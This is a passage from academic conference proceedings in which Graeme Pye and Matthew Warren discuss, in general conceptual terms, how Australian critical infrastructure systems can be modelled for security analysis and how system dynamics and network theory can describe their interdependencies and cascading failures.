Identify potential system choke po<strong>in</strong>ts, s<strong>in</strong>gle po<strong>in</strong>ts of failure and other likely security vulnerabilities;<br />
Model assessments of potential security measures for systems prior to their physical implementation;<br />
Apply risk and security mitigation strategies to test and evaluate the beneficial or otherwise outcomes<br />
for cont<strong>in</strong>uity plann<strong>in</strong>g and development; and<br />
Models must be conceptually representative of the physically distributed nature and functionality<br />
characteristics of the subject <strong>in</strong>frastructure systems.<br />
Understand<strong>in</strong>g and appreciat<strong>in</strong>g the characteristics and idiosyncrasies of critical <strong>in</strong>frastructure systems<br />
and the specific considerations are the foundations upon which the conceptual modell<strong>in</strong>g of these<br />
systems can deliver the modell<strong>in</strong>g objectives as listed previously. The modell<strong>in</strong>g of such systems<br />
demands of the modeller an <strong>in</strong>timate understand<strong>in</strong>g and appreciation of the complexities of subject<br />
systems, to deliver a representative and well-scoped model, for without the knowledge gleaned from<br />
analys<strong>in</strong>g system models, any subsequent critical <strong>in</strong>frastructure system model produced cannot be a<br />
representative model.<br />
199
Graeme Pye and Matthew Warren<br />
7. Australia’s critical <strong>in</strong>frastructure: Discussion and context<br />
Critical <strong>in</strong>frastructure systems are vitally important to the economy and the community. Particularly with<br />
the proliferation of telecommunication and <strong>in</strong>formation <strong>in</strong>frastructures, it is apparent the profound<br />
<strong>in</strong>fluence those critical <strong>in</strong>frastructures and the services they deliver to all levels, structures and<br />
functionality of the economy and society. As history has shown, <strong>in</strong>frastructure <strong>in</strong>novation has boosted<br />
economic growth, contributed to improved public health, changed the mobility of society and improved<br />
<strong>in</strong>formation networks and brought comfort to the community.<br />
In many aspects, present-day critical <strong>in</strong>frastructures were laid out to service the development of an<br />
<strong>in</strong>dustrial economy and to an extent seemed <strong>in</strong>adequate and ill-prepared as the backbone of the new<br />
modern economic structure relat<strong>in</strong>g to <strong>in</strong>formation and knowledge-based services. The service-based<br />
economy expects highly reliable, flexible and quality services rather than cheap utilities and commoditybased<br />
services. There is cont<strong>in</strong>u<strong>in</strong>g public consternation with the performance of some critical<br />
<strong>in</strong>frastructures particularly where users have tailor-made quality-of-service and service-on-demand<br />
expectations that have been plagued with problems of road congestion, power outages, stressed public<br />
transport systems, viruses and denial of service attacks on the <strong>in</strong>ternet.<br />
It seems that many of the traditional critical <strong>in</strong>frastructures were slow <strong>in</strong> adapt<strong>in</strong>g to societal demands.<br />
This is <strong>in</strong> part due to the deep ‘embeddedness’ <strong>in</strong> spatial and economic structure <strong>in</strong>clud<strong>in</strong>g the large,<br />
long-term capital <strong>in</strong>vestment <strong>in</strong> the physical basis of critical <strong>in</strong>frastructure systems, which rema<strong>in</strong> barriers<br />
to the adoption of timely <strong>in</strong>novations and their adaptation to chang<strong>in</strong>g requirements of users and system<br />
security and service availability requirements. However, <strong>in</strong> contrast to the resistance of physical<br />
<strong>in</strong>frastructures to change, profound and ongo<strong>in</strong>g change has been unleashed <strong>in</strong> the Australian context<br />
with public ownership, organisation and market structure of critical <strong>in</strong>frastructure sectors result<strong>in</strong>g from<br />
de-regulation and privatisation of critical <strong>in</strong>frastructure systems. Additionally, the convergence of markets<br />
and the contraction of ownership <strong>in</strong>to multi-utility organisations will greatly <strong>in</strong>crease the complexity of<br />
<strong>in</strong>frastructure <strong>in</strong>dustries and the regulation of <strong>in</strong>frastructure bound markets.<br />
The private and public owners <strong>in</strong> the <strong>in</strong>frastructure <strong>in</strong>dustry now have heightened security obligations with<br />
regard to the Australian national security status. This <strong>in</strong>cludes ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g critical <strong>in</strong>frastructure system<br />
availability and supply of services to <strong>in</strong>dustry, bus<strong>in</strong>ess and the wider community who are <strong>in</strong>creas<strong>in</strong>gly<br />
dependent and reliant on critical <strong>in</strong>frastructure systems. Further compound<strong>in</strong>g this situation is the<br />
<strong>in</strong>creas<strong>in</strong>g <strong>in</strong>terconnectedness between <strong>in</strong>frastructures via the <strong>in</strong>formation communication technologies<br />
that are <strong>in</strong>creas<strong>in</strong>gly pervad<strong>in</strong>g these systems and therefore creat<strong>in</strong>g new <strong>in</strong>teractions, <strong>in</strong>terdependencies<br />
and dependency relationships. These technological <strong>in</strong>novations have thus <strong>in</strong>troduced new risks and<br />
vulnerabilities enabl<strong>in</strong>g decentralised utility supply, distributed, autonomous control of network operations<br />
and <strong>in</strong>formation shar<strong>in</strong>g provided by multifunctional <strong>in</strong>formation and communication <strong>in</strong>frastructures.<br />
The collection of <strong>in</strong>teractive change processes <strong>in</strong> the Australian <strong>in</strong>frastructure <strong>in</strong>dustry is creat<strong>in</strong>g a new<br />
generation of critical <strong>in</strong>frastructures so <strong>in</strong>terwoven with new technologies that traditional approaches to<br />
manag<strong>in</strong>g spatial plann<strong>in</strong>g, policy mak<strong>in</strong>g, regulation, technological, <strong>in</strong>formation and communication,<br />
physical and cyber security require reth<strong>in</strong>k<strong>in</strong>g. Similarly, governments and owners and operators have to<br />
take <strong>in</strong>to account their <strong>in</strong>teractions and connections with other critical and non-critical <strong>in</strong>frastructure<br />
systems, particularly <strong>in</strong> terms of capacity allocation, service provision, system availability plann<strong>in</strong>g and<br />
security as a function of chang<strong>in</strong>g economic and regulatory conditions. Furthermore, understand<strong>in</strong>g<br />
critical <strong>in</strong>frastructure system behaviour and security implications, vulnerabilities and mitigat<strong>in</strong>g identified<br />
security risks is a current concern of many nations, <strong>in</strong>clud<strong>in</strong>g Australia.<br />
In terms of a system th<strong>in</strong>k<strong>in</strong>g perspective and comprehend<strong>in</strong>g the design, operation, management and<br />
ultimately the security of any critical <strong>in</strong>frastructure system, it is important to be able to conceptualise the<br />
system goals, performance at differ<strong>in</strong>g levels of the greater system structure and the behavioural aspects<br />
of subsystems. Structurally, critical <strong>in</strong>frastructures are large <strong>in</strong>tegrated systems, which are comprised of<br />
subsystems l<strong>in</strong>ked together <strong>in</strong>to a network organised system. The result is a ‘cause and effect’ <strong>in</strong>fluenced<br />
system with <strong>in</strong>tegrated subsystems and <strong>in</strong>terfaces enabl<strong>in</strong>g <strong>in</strong>teractive effects. Particularly where an<br />
<strong>in</strong>terface represents: the contact area between one system and another system element; or the system<br />
and the human; or its environment. For example, such <strong>in</strong>teractions across an <strong>in</strong>terface may relate to<br />
energy and material flows, <strong>in</strong>formation exchanges, personal communications, and propagation of cause<br />
and effect <strong>in</strong>fluences, operational decisions and control manipulations.<br />
200
8. Conclusion<br />
Graeme Pye and Matthew Warren<br />
As Bentley (2006) <strong>in</strong>timates, critical <strong>in</strong>frastructure systems tend to be <strong>in</strong>terdependent and even<br />
<strong>in</strong>terconnected and systems failure – be it through natural disaster, terrorism or poor management – can<br />
br<strong>in</strong>g entire communities and their <strong>in</strong>dustries and utilities to a gr<strong>in</strong>d<strong>in</strong>g halt. Therefore, the ability to<br />
analyse and critique the security aspects of critical <strong>in</strong>frastructure systems, together with modell<strong>in</strong>g these<br />
systems offers an avenue for assess<strong>in</strong>g critical <strong>in</strong>frastructure system security, identify<strong>in</strong>g vulnerabilities<br />
and locat<strong>in</strong>g <strong>in</strong>herent weaknesses, so appropriate solutions and remedial action can be implemented to<br />
mitigate such security risks to system availability and service supply. To address this directly and return<br />
to the focus of this research with regard to how to critique and model critical <strong>in</strong>frastructure systems, the<br />
previous system analyse and modell<strong>in</strong>g descriptions have outl<strong>in</strong>ed a number of differ<strong>in</strong>g methodological<br />
approaches and their characteristics. Additionally, descriptions of a number of potential system modell<strong>in</strong>g<br />
approaches applicable <strong>in</strong> a security context were characterised and are potentially both adaptable and<br />
suitable to modell<strong>in</strong>g critical <strong>in</strong>frastructure systems. While each system security analysis approach and<br />
system modell<strong>in</strong>g approach reviewed is capable on their own terms, they rema<strong>in</strong> limited and narrow <strong>in</strong><br />
focus for analysis and modell<strong>in</strong>g of critical <strong>in</strong>frastructure systems. Therefore, it is proposed that a possible<br />
solution to critique and model critical <strong>in</strong>frastructure systems may lay <strong>in</strong> the development of a generic<br />
multifaceted or blended methodology that outl<strong>in</strong>es the adoption of multiple system analysis and modell<strong>in</strong>g<br />
approaches. This would represent a hybrid methodology that <strong>in</strong> turn would form the basis for comb<strong>in</strong><strong>in</strong>g<br />
multiple approaches as a s<strong>in</strong>gle multifaceted practical framework application for security analysis and<br />
modell<strong>in</strong>g of a critical <strong>in</strong>frastructure system.<br />
References<br />
Avison D.E. (2003a), 'Blended Methodologies', <strong>in</strong> Information systems development, methodologies, techniques and<br />
tools, (ed.). 3rd Edition, McGraw Hill, Maidenhead Berkshire, pp. 379-387.<br />
Avison D.E. (2003b), 'Modell<strong>in</strong>g Themes', <strong>in</strong> Information systems development, methodologies, techniques and tools,<br />
(ed.). 3rd Edition, McGraw Hill, Maidenhead Berkshire, pp. 73-81.<br />
Bentley A. (2006), 'Infrastructure: Critical Mass', CSIRO Solve, No.7.<br />
Berntsen K.E. Sampson J. Osterlie T. (nd), Interpretive research methods <strong>in</strong> computer science. Onl<strong>in</strong>e:<br />
http://www.idi.ntnu.no/~thomasos/paper/<strong>in</strong>terpretive.pdf Accessed: April 2008.<br />
Brown T. Beyeler W. Barton D. (2004), 'Assess<strong>in</strong>g <strong>in</strong>frastructure <strong>in</strong>terdependencies: the challenge of risk analysis for<br />
complex adaptive systems', International Journal of Critical Infrastructures, Vol.1, No.1, pp. 108-117.<br />
CIPMA (2007), Critical Infrastructure Protection Modell<strong>in</strong>g and Analysis (CIPMA) Program. Fact Sheet, Trusted<br />
Information Shar<strong>in</strong>g Network (TISN). Onl<strong>in</strong>e: http://www.tisn.gov.au Accessed: December 2007.<br />
Dennis A. Wixon B.H. Roth R.M. (2009), Systems Analysis & Design with UML Version 2.0, 3rd Edition, John Wiley &<br />
Sons Inc., New York, USA.<br />
Little R.G. (2003), 'Toward More Robust Infrastructure: Observations on Improv<strong>in</strong>g the Resilience and Reliability of<br />
Critical Systems', <strong>in</strong> 36th Hawaii International Conference on System Sciences (HICSS'03) IEEE Computer<br />
Society, pp. 58-66.<br />
Macdonald R & Bologna S. (2003), Advanced Modell<strong>in</strong>g and Simulation Methods and Tools for Critical Infrastructure<br />
Protection. Onl<strong>in</strong>e: http://www.iabg.de/acip/doc/wp4/D4_5_v0_1_RM.pdf Accessed: March 2003.<br />
Murray A.T. & Grubesic T.H. (2007), 'Overview of Reliability and Vulnerability <strong>in</strong> Critical Infrastructure', <strong>in</strong> Critical<br />
Infrastructure, (ed.). Spr<strong>in</strong>ger Berl<strong>in</strong> Heidelberg, Berl<strong>in</strong>, pp. 1-8.<br />
Muss<strong>in</strong>gton D. (2002), Concepts for Enhanc<strong>in</strong>g Critical Infrastructure Protection: Relat<strong>in</strong>g Y2K to CIP Research and<br />
Development, RAND Santa Monica, CA, USA.<br />
Pederson P. Dudenhoeffer D. Hartley S. Permann M. (2006), Critical Infrastructure Interdependency Model<strong>in</strong>g: A<br />
Survey of U.S. and International Research, Idaho National Laboratory (INL), Idaho Falls.<br />
Peters K. Buzna L. Helb<strong>in</strong>g D. (2008), 'Modell<strong>in</strong>g of cascad<strong>in</strong>g effects and efficient response to disaster spread<strong>in</strong>g <strong>in</strong><br />
complex networks', International Journal of Critical Infrastructures, Vol.4, No.1/2, pp. 46-62.<br />
Pidd M. (1996), 'Five Simple Pr<strong>in</strong>ciples of Modell<strong>in</strong>g', <strong>in</strong> Proceed<strong>in</strong>gs of the 1996 W<strong>in</strong>ter Simulation Conference,<br />
ACM, pp. 721-728.<br />
Pye G. & Warren M.J. (2006), '<strong>Security</strong> Management: Modell<strong>in</strong>g Critical Infrastructure', Journal of Information<br />
Warfare, Vol.5, No.1, pp. 46-61.<br />
Pye G. & Warren M.J. (2007), 'Locat<strong>in</strong>g Risk through Modell<strong>in</strong>g Critical Infrastructure Systems', <strong>in</strong> Human Aspects of<br />
Information <strong>Security</strong> & Assurance (HAISA), Plymouth, UK, pp. 87-98.<br />
Schulman P.R. & Roe E. (2007), 'Design<strong>in</strong>g Infrastructures: Dilemmas of Design and the Reliability of Critical<br />
Infrastructures', Journal of Cont<strong>in</strong>gencies and Crisis Management, Vol.15, No.1, pp. 42-49.<br />
Svendsen N.K. & Wolthusen S.D. (2007), 'Connectivity models of <strong>in</strong>terdependency <strong>in</strong> mixed-up critical <strong>in</strong>frastructure<br />
networks', Information <strong>Security</strong> Technical Report, Vol.12, No.1, pp. 44-55.<br />
Wood-Harper A.T. Antill L. Avison D.E. (1985), Information Systems Def<strong>in</strong>ition: The Multiview Approach Blackwell<br />
Scientific Publications, Oxford.<br />
Zimmerman R. & Restrepo C.E. (2006), 'The next step: quantify<strong>in</strong>g <strong>in</strong>frastructure <strong>in</strong>terdependencies to improve<br />
security', International Journal of Critical Infrastructures, Vol.2, No.2/3, pp. 201-214.<br />
201
Modell<strong>in</strong>g Relational Aspects of Critical Infrastructure<br />
Systems<br />
Graeme Pye and Matthew Warren<br />
Deak<strong>in</strong> University, Geelong, Australia<br />
graeme@deak<strong>in</strong>.edu.au<br />
mwarren@deak<strong>in</strong>.edu.au<br />
Abstract: The relational aspects for critical <strong>in</strong>frastructure systems are not readily quantifiable as there are numerous<br />
variability’s and system dynamics that lack uniformity and are difficult to quantify. Notwithstand<strong>in</strong>g this, there is a<br />
large body of exist<strong>in</strong>g research that is founded <strong>in</strong> the area of quantitative analysis of critical <strong>in</strong>frastructure networks,<br />
their system relationships and the resilience of these networks. However, the focus of this research is to <strong>in</strong>vestigate<br />
the aspect of tak<strong>in</strong>g a different, more generalised and holistic system perspective approach. This is to suggest that<br />
that through apply<strong>in</strong>g network theory and tak<strong>in</strong>g a ‘soft’ system-like modell<strong>in</strong>g approach that this offers an alternative<br />
approach to view<strong>in</strong>g and modell<strong>in</strong>g critical <strong>in</strong>frastructure system relational aspects that warrants further enquiry.<br />
Keywords: critical <strong>in</strong>frastructure, dependency relationships, systems modell<strong>in</strong>g<br />
1. Introduction<br />
Modern critical <strong>in</strong>frastructure systems exist ubiquitously and what constitutes a system evokes different<br />
mean<strong>in</strong>gs, perceptions and conceptual visualisations to different <strong>in</strong>dividuals depend<strong>in</strong>g on their<br />
<strong>in</strong>terpretation of the focal structure. Essentially, a system construct is a derivation of its functional<br />
characteristics, physical structure, response behaviours and <strong>in</strong>corporates its <strong>in</strong>ferred complexity of<br />
components that <strong>in</strong>teract to form a s<strong>in</strong>gle functional system representation. Systems exist to perform<br />
purposeful functions and they are as elementary as a s<strong>in</strong>gle function system or as a large complex<br />
systems comprised of numerous subsystems, all work<strong>in</strong>g cooperatively for the common <strong>in</strong>tent (Maani &<br />
Cavana 2000).<br />
Systems of this structure are characterised as networks, where the components form the nodes that l<strong>in</strong>k<br />
together form<strong>in</strong>g the network system topology that facilitate <strong>in</strong>teractions between the nodes with<strong>in</strong> the<br />
wider network. Many physical <strong>in</strong>frastructure systems are characterised as networks, for <strong>in</strong>stance power<br />
and water distribution grids are large common examples of networks, but there are many less obvious<br />
and smaller example systems cast <strong>in</strong> this form. The advantage of view<strong>in</strong>g systems as networks is that<br />
their determ<strong>in</strong><strong>in</strong>g behaviour is largely a result of the pattern or topology of network l<strong>in</strong>kages, rather than<br />
what specifically passes across the l<strong>in</strong>ks. Therefore, understand<strong>in</strong>g how the network functions as a<br />
degree of its topology can assist <strong>in</strong> deduc<strong>in</strong>g how the system is likely to behave by <strong>in</strong>vestigat<strong>in</strong>g its<br />
network configuration (F<strong>in</strong>nigan 2005).<br />
There are many different system structures and configurations that characterise network systems and<br />
their dynamic functional behaviours. This paper seeks to outl<strong>in</strong>e the premise of future research focuss<strong>in</strong>g<br />
on a particular network theory as the basis of critical <strong>in</strong>frastructure system research and two <strong>in</strong>terpretative<br />
modell<strong>in</strong>g approaches for modell<strong>in</strong>g the relational aspects of dynamic critical <strong>in</strong>frastructure systems. This<br />
will act is a precursor to determ<strong>in</strong><strong>in</strong>g a modell<strong>in</strong>g approach that is suitable for illustrat<strong>in</strong>g the <strong>in</strong>ter-system<br />
relationships between dynamic critical <strong>in</strong>frastructure systems and their dependency and <strong>in</strong>terdependency<br />
aspects.<br />
2. System dynamics<br />
System dynamics as Forrester (1991, p.5) expla<strong>in</strong>s “comb<strong>in</strong>es the theory, methods and philosophy<br />
needed to analyse the behaviour of systems <strong>in</strong> not only management, but also <strong>in</strong> environmental change,<br />
politics, economic behaviour, medic<strong>in</strong>e, eng<strong>in</strong>eer<strong>in</strong>g, and other fields.” System dynamics provides a<br />
common foundation that when applied, can deliver <strong>in</strong>sights <strong>in</strong>to changes occurr<strong>in</strong>g with<strong>in</strong> systems over<br />
time by draw<strong>in</strong>g upon concepts from the field of feedback control.<br />
Therefore, systems dynamics is utilised as a method for analys<strong>in</strong>g, study<strong>in</strong>g and manag<strong>in</strong>g complex<br />
feedback systems. Feedback is the situation where via a process of ‘cause and effect’, X <strong>in</strong>fluences Y,<br />
which <strong>in</strong> turn <strong>in</strong>fluences X via a feedback process. Therefore, the study of X and Y cannot be undertaken<br />
<strong>in</strong>dependently as it is the l<strong>in</strong>k between X and Y that predicates how the system will behave (SDS 2006).<br />
This example illustrates the circular process where dynamic decisions cause changes that <strong>in</strong> turn will<br />
<strong>in</strong>fluence later decisions with<strong>in</strong> the system structure (Forrester 1998) as shown <strong>in</strong> Figure 1.<br />
202
Graeme Pye and Matthew Warren<br />
Figure 1: Closed-Loop structure of the world (Forrester 1991)<br />
The elementary premise of a feedback system is that each action is <strong>in</strong> response to the current conditions<br />
and therefore such actions <strong>in</strong> turn affect further conditions, which become the conditional basis for future<br />
action. There is no beg<strong>in</strong>n<strong>in</strong>g or end to this feedback process and this is further complicated with other<br />
<strong>in</strong>terconnection relationships and the <strong>in</strong>teractions of human be<strong>in</strong>gs (Forrester 1968). As such, the<br />
<strong>in</strong>tertw<strong>in</strong><strong>in</strong>g of many feedback loops can result <strong>in</strong> local or global cascad<strong>in</strong>g cha<strong>in</strong>s of actions where a<br />
system is react<strong>in</strong>g to the echo of the system’s past actions, <strong>in</strong>clud<strong>in</strong>g the past actions of other entw<strong>in</strong>ed<br />
systems (Forrester 1994 & 1995, Checkland 2000, Watts 2000).<br />
In reality, system feedback is <strong>in</strong>evitably what confronts people who are responsible for the operational<br />
control of dynamic systems <strong>in</strong> situations such as <strong>in</strong>dustrial production, national economics, global<br />
warn<strong>in</strong>g or even <strong>in</strong>terpersonal relationships. Contextually, the responses to these problems are<br />
manifestly dynamic decisions that require additional and related decisions because the situation changes,<br />
both by itself and <strong>in</strong> response to the previous decisions and actions taken (Jensen & Brehmer 2003). As<br />
Warren (2005) identifies, the dynamics of systems requires the application of powerful logic to<br />
comprehend how systems are consequence reactive to changes and decisions taken <strong>in</strong> the management<br />
and control of such systems, which add further complexity to the operation of dynamic systems.<br />
The study of system dynamics is concerned with construct<strong>in</strong>g quantitative and qualitative models of<br />
complex problem doma<strong>in</strong>s and then <strong>in</strong>vestigat<strong>in</strong>g the response behaviours of the system models over<br />
time. Accord<strong>in</strong>g to Luna-Reyes and Anderson (2003) system dynamics depends heavily on quantitative<br />
data to generate feedback models, although the analysis of qualitative data has a role to play at all levels<br />
of the modell<strong>in</strong>g challenge. Often the experimentation undertaken with these models demonstrates how<br />
unappreciated causal relationships, dynamic complexity and structural delays become with<strong>in</strong> the subject<br />
system, which leads to counter-<strong>in</strong>tuitive results of less <strong>in</strong>formed approaches to improv<strong>in</strong>g system<br />
functionality. Additionally, system dynamic models enable the <strong>in</strong>corporation of ‘soft’ factors such as<br />
motivation and perception that are advantageous to improved system understand<strong>in</strong>g and management<br />
(Caulfield & Maj 2002).<br />
3. Dynamic systems modell<strong>in</strong>g<br />
Construct<strong>in</strong>g a useful <strong>in</strong>terpretation or model a dynamic system requires an analysis of the system to<br />
deliver a useful understand<strong>in</strong>g of the system situation through elaboration, exploitation and <strong>in</strong>terpretation<br />
of the system. While this is heavily reliant on the mental <strong>in</strong>terpretation of the developer, it is a useful<br />
representation of a given understand<strong>in</strong>g of the system situation at a given moment, together with the<br />
perceived structure of the system (Schaffernicht 2006). There is no s<strong>in</strong>gle formalised approach applicable<br />
to modell<strong>in</strong>g system dynamics, however Caulfield and Maj (2002) suggest the lessons for modellers are<br />
to: just start modell<strong>in</strong>g, try th<strong>in</strong>gs, listen to the advice of experienced modellers and simply iterate, iterate<br />
and iterate the model development process.<br />
Modell<strong>in</strong>g the dynamic behaviours with<strong>in</strong> systems offers some potential benefits <strong>in</strong>clud<strong>in</strong>g (Caulfield &<br />
Maj 2002):<br />
Dynamic system modell<strong>in</strong>g contributes to develop<strong>in</strong>g an understand<strong>in</strong>g of the subject system problem<br />
doma<strong>in</strong> through the processes of analysis and critical th<strong>in</strong>k<strong>in</strong>g, as applied to a physical system.<br />
A primary benefit of dynamic system modell<strong>in</strong>g lies <strong>in</strong> its ability to not only represent quantitative or<br />
‘hard’ system variables such as program size, staff<strong>in</strong>g numbers or cost of <strong>in</strong>vestment; but also the<br />
qualitative or ‘soft’ variables that impact system dynamics, such as motivation, commitment,<br />
confidence or perceptions.<br />
203
Graeme Pye and Matthew Warren<br />
Traditionally, the focus has been on the quantitative variables of the system because of an applied<br />
eng<strong>in</strong>eer<strong>in</strong>g approach and considerations of the ‘soft’ variables were too difficult to measure and their<br />
importance underestimated. Yet the risk of omitt<strong>in</strong>g the ‘soft’ variable circumstances is to fail to consider<br />
the essential human impact.<br />
System improvement alternatives often come from <strong>in</strong>tuitive <strong>in</strong>sights uncovered dur<strong>in</strong>g the <strong>in</strong>itial analysis,<br />
from the previous experience of the analyst, from proposals forwarded by people operat<strong>in</strong>g the system<br />
based on their practical experiences and the skill of imag<strong>in</strong><strong>in</strong>g creative alternatives. As Senge (1990)<br />
<strong>in</strong>dicates, the cause of many problems lie <strong>in</strong> the well <strong>in</strong>tentioned policies designed to alleviate them,<br />
developed by policymakers lured <strong>in</strong>to design<strong>in</strong>g and apply<strong>in</strong>g <strong>in</strong>terventions that only focus on the<br />
symptoms and not the underly<strong>in</strong>g causes. This approach only produces short-term benefits and fosters<br />
the need for further symptomatic <strong>in</strong>terventions. However, by modell<strong>in</strong>g and simulat<strong>in</strong>g the problem<br />
doma<strong>in</strong> us<strong>in</strong>g a systems dynamic model, it is possible to enact decisions from a more <strong>in</strong>formed rational<br />
basis, safe from the actual physical dangers of real-world experimentation and complexity (Caulfield &<br />
Maj 2002).<br />
4. Complex systems paradigm<br />
In essence, the dynamics with<strong>in</strong> each system is dissimilar because of factors such as the structure,<br />
environment and complexity of the system itself that will <strong>in</strong>fluence the dynamics of systems. The<br />
theoretical study of complex systems has been on the organisational arrangements that <strong>in</strong>fluence the<br />
development and persistence of particular system features. Although it is the relationship between<br />
system elements (i.e. structure), rather than the system elements and their properties (i.e. composition)<br />
that are significant. The emphasis on structure over composition makes the analytical approach to<br />
study<strong>in</strong>g complex systems applicable across discipl<strong>in</strong>es as many different types of systems can be<br />
characterised utilis<strong>in</strong>g similar analytical tools (Parrott & Kok 2000).<br />
The <strong>in</strong>creased capabilities of comput<strong>in</strong>g power have enabled the <strong>in</strong>vestigation of networks consist<strong>in</strong>g of<br />
millions of nodes and therefore explore questions that were previously beyond comprehension. This<br />
accord<strong>in</strong>g to Christensen and Albert (2007) underl<strong>in</strong>es the need to move beyond reductionist<br />
approaches, where understand<strong>in</strong>g of all complex systems is <strong>in</strong> terms of their simpler components, to an<br />
approach that <strong>in</strong>stead attempts to understand the behaviour of the system as a whole.<br />
5. Network systems paradigm<br />
Many physical systems consist of network configurations, for <strong>in</strong>stance, power and water distribution grids<br />
are large common examples of networks, but there are many less obvious and smaller example systems<br />
cast <strong>in</strong> this form. The advantage of view<strong>in</strong>g systems as networks is that typically their determ<strong>in</strong><strong>in</strong>g<br />
behaviour is largely a result of the pattern or topology of network l<strong>in</strong>kages, rather than what specifically<br />
passes across the l<strong>in</strong>ks. Therefore, understand<strong>in</strong>g how the network system functions as a degree of its<br />
topology can assist <strong>in</strong> deduc<strong>in</strong>g how the system is likely to behave by <strong>in</strong>vestigat<strong>in</strong>g its network<br />
configuration (F<strong>in</strong>nigan 2005).<br />
Interest<strong>in</strong>gly, the network theory research of Watts (2004) draws together the analysis and modell<strong>in</strong>g of<br />
networks <strong>in</strong>corporat<strong>in</strong>g dynamic features of real-world systems, where their <strong>in</strong>teractions are characterised<br />
as neither entirely ordered or completely random, but tend to exhibit properties of both. The criterion that<br />
is the premise of this network theory is that networks are (Watts 1999a):<br />
Characterised as a large number of connected elements;<br />
The network is sparse <strong>in</strong> structure where each element is connected to only an average but not all<br />
other elements of the network;<br />
The network is decentralised and there is no dom<strong>in</strong>ate central po<strong>in</strong>t of connection;<br />
There is a cluster<strong>in</strong>g element where there is some degree of overlapp<strong>in</strong>g <strong>in</strong>ter-nodal connection<br />
between elements with<strong>in</strong> neighbour<strong>in</strong>g network system clusters.<br />
A feature of this type of distributed network structure is that some of the network elements are more<br />
significant than others because of their connectedness with other connected elements, <strong>in</strong>clud<strong>in</strong>g those<br />
with<strong>in</strong> other overlapp<strong>in</strong>g clusters.<br />
As Callaway et al (2000) attests, the <strong>in</strong>ternet, social networks, airl<strong>in</strong>e routes and electric power grids<br />
exemplify networks of this nature whose function and resilience critically relies on the pattern of<br />
<strong>in</strong>terconnection between the elemental components of the system. The degree of robustness or fragility<br />
204
Graeme Pye and Matthew Warren<br />
of the overall system is largely dependent on the configuration of the network connections. Therefore,<br />
Callaway et al (ibid) postulates that if the pattern of connection is appropriately chosen, then the network<br />
system can be highly resilient to random lose of network elements result<strong>in</strong>g <strong>in</strong> only m<strong>in</strong>imal localised loss<br />
of function.<br />
However, the network would rema<strong>in</strong> susceptible to a targeted attack on specifically chosen and<br />
significant network elements or l<strong>in</strong>kages, whose loss would globally impact the entire network system<br />
functionality. Watt’s (1999b) supports this premise too where the dynamic functional sense of the entire<br />
network, local actions with<strong>in</strong> the network system can have causal global consequences. This <strong>in</strong>fluence is<br />
a product of the relationship between the properties of local and global dynamics that depend critically on<br />
the structural connectivity and topology of the network.<br />
Therefore, the anatomy of the network is important because the structure affects the function, so the<br />
topology of a social network will affect the spread of <strong>in</strong>formation, or disease; likewise the topology of an<br />
electrical power grid will affect the robustness and stability of the transmission system and the availability<br />
of supply (Strogatz 2001). Many of these network systems exist widely <strong>in</strong> the modern world and are<br />
evident as differ<strong>in</strong>g categories of network systems with differ<strong>in</strong>g functions, but all serve to l<strong>in</strong>k together<br />
those elements necessary to achieve the greater goal.<br />
6. Network system types<br />
In achiev<strong>in</strong>g their common goal, the nature of networks and their type represent the l<strong>in</strong>kages between<br />
differ<strong>in</strong>g system entities, which likewise have a vested <strong>in</strong>terest <strong>in</strong> cooperat<strong>in</strong>g together to achieve the<br />
greater goal.<br />
There are pr<strong>in</strong>cipally four loose categories of networks (Newman 2003):<br />
1. Social networks consist of a set of people or groups of people with some pattern of contacts or<br />
<strong>in</strong>teractions between them.<br />
2. Information networks are sometimes called knowledge networks. The classic example of an<br />
<strong>in</strong>formation network is the network of citations between academic papers.<br />
3. Technological networks are man-made networks typically designed for the distribution of some<br />
commodity or resource, such as electricity or <strong>in</strong>formation. The electric power grid is a prime example<br />
<strong>in</strong>clud<strong>in</strong>g the telephone network and the underly<strong>in</strong>g telecommunication <strong>in</strong>frastructure.<br />
4. Biological networks represent suitable systems <strong>in</strong> nature and perhaps the classic example of a<br />
biological network is the network of metabolic pathways, which is a representation of metabolic<br />
substrates and products with connections jo<strong>in</strong><strong>in</strong>g them, if a known metabolic reaction exists that acts on<br />
the given substrate and produces a given product.<br />
The common characteristic of these systems is that when a network is carry<strong>in</strong>g a particular resource<br />
(friendship, data, electricity or biological substrate) the nodes of the network will experience a load and <strong>in</strong><br />
normal circumstances the magnitude of the load would not exceed the capacity of the node.<br />
Unfortunately failures tend to cascade <strong>in</strong> a network environment, for <strong>in</strong>stance, if a heavily loaded node is<br />
lost, then a redistribution of the load (i.e. the flow pass<strong>in</strong>g through it) to other functional nodes with<strong>in</strong> the<br />
network is undertaken. However, this redistribution may cause other nodes to exceed their load capacity<br />
caus<strong>in</strong>g them to fail too, thereby propagat<strong>in</strong>g the failure to the extent that it cascades across the network<br />
until all network nodes fail. Although, if the overloaded node did not fail, then protection mechanisms shut<br />
it down anyway, to prevent a node failure from propagat<strong>in</strong>g throughout the network and cascad<strong>in</strong>g across<br />
the entire network (Newth & Ash 2005). Normally network systems can cope with load changes and<br />
adapt <strong>in</strong> a limited manner to address those problems of load distribution, although they are not strictly<br />
adaptive or necessarily totally autonomous systems.<br />
For example, large-scale <strong>in</strong>terconnected <strong>in</strong>frastructures such as telecommunications networks and the<br />
<strong>in</strong>ternet are complex adaptive systems. These <strong>in</strong>frastructures are vastly more adaptive and dynamic <strong>in</strong><br />
comparison to their predecessors and consist of large numbers of diverse components and participants<br />
of differ<strong>in</strong>g forms, function and capability (Herder & Verwater-Lukszo 2006). Additionally, these<br />
<strong>in</strong>frastructure systems also exhibit characteristic unstable coherence and resilience <strong>in</strong> spite of<br />
205
Graeme Pye and Matthew Warren<br />
environmental disruptions or central governance (North et al 2002) and go a long way towards be<strong>in</strong>g<br />
resilient systems.<br />
Furthermore from the networked system perspective, the research of Watts (2004) draws together the<br />
analysis and modell<strong>in</strong>g of networks <strong>in</strong>corporat<strong>in</strong>g dynamic features of physical systems, where their<br />
<strong>in</strong>teractions are characterised as neither entirely ordered or completely random, but tend to exhibit<br />
properties of both. The premise of this network structure criteria is that networks are: characterised as a<br />
large number of connected elements; the network is sparse <strong>in</strong> structure where each element is connected<br />
to only an average but not all other elements of the network; the network is decentralised and there is no<br />
dom<strong>in</strong>ate central po<strong>in</strong>t of connection and f<strong>in</strong>ally the network is clustered where there is some degree of<br />
overlapp<strong>in</strong>g connection between elements with<strong>in</strong> neighbour<strong>in</strong>g system networks clusters (Watts 1999a).<br />
The significance of this view of critical <strong>in</strong>frastructure systems is that it characterises to an extent the<br />
